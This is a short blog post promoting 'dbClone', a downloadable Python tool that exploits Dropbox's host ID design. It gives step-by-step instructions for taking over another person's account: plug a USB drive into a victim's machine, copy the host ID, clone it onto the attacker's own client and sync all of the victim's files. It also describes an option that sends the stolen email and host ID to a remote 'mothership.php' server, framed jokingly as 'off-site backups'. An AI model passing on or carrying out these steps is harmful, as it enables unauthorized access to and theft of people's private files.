The Hack o blog

Reinventing the weel

Dropbox authentication exploit, dbClone.

Image representing Dropbox as depicted in Crun...

Image via CrunchBase

After reading this article on dereknewton.com about Dropbox’s insecure design, sablefoxx: a resourceful young coder on the forum created a python application to exploit the insecure design of the most popular file synchronisation tool Dropbox.

Download dbClone from here or on the downloadpage.
[1] Find a victim machine running Dropbox, insert your USB drive
[2] Run dbClone.exe, data will be saved in a .txt file
[3] On your own computer install the Dropbox client and run “dbClone.exe -i”
[4] Paste in the ‘hostid’ from the .txt file into the ‘hostid’ prompt, enter /any/ email
[5] Start up the Dropbox client, and sync all the files!!!

But Wait There’s More!:

Use -m to upload the email and hostid to your webserver (via GET),
for example “dbClone.exe -m http://somesite.com” (Note is appends
“mothership.php” to the url), example code in /src/mothership.php!

Tested on Windows 7 & Ubuntu 10.10 but should run on just about any Windows/Linux box without much fuss. They really should fix this problem, also this program can also send the HostIds to a remote web server (for off-site backups of course).

Source code is included.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: